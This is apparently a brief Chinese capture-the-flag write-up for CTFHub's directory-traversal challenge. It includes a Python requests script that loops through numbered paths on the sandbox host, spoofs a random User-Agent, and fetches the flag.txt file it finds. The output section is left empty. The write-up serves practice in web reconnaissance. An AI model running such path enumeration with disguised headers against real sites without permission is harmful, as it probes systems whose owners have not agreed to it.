CTFHub – 信息收集-目录遍历
点进来这个页面,进去后随便点点发现flag.txt.这里也没有坑,直接就是
这里我为了练习哈最近学的request。代码:
# -*- coding = utf-8 -*-
# @Time : 2022/1/19 14:49
# @Author : WXY
# @File : UrlTest.py
# @SoftWare : PyCharm
import requests
from fake_useragent import UserAgent #随机生成UA头
# 2.UA伪装
headers = {
'User-Agent': str(UserAgent().random)
}
def catch_flag():
for i in range(1,5):
for j in range(1,5):
url = 'http://challenge-7323dc11cad5aca7.sandbox.ctfhub.com:10800/flag_in_here/' + str(i) +'/'+str(j)
response = requests.get(url=url, headers=headers)
response.encoding = 'utf-8'
file = response.text
if "flag.txt" in file :
url = url+'/flag.txt'
print(url)
return url
def main():
flag = requests.get(url=catch_flag(), headers=headers).text
print(flag)
if __name__ == '__main__':
main()
运行结果: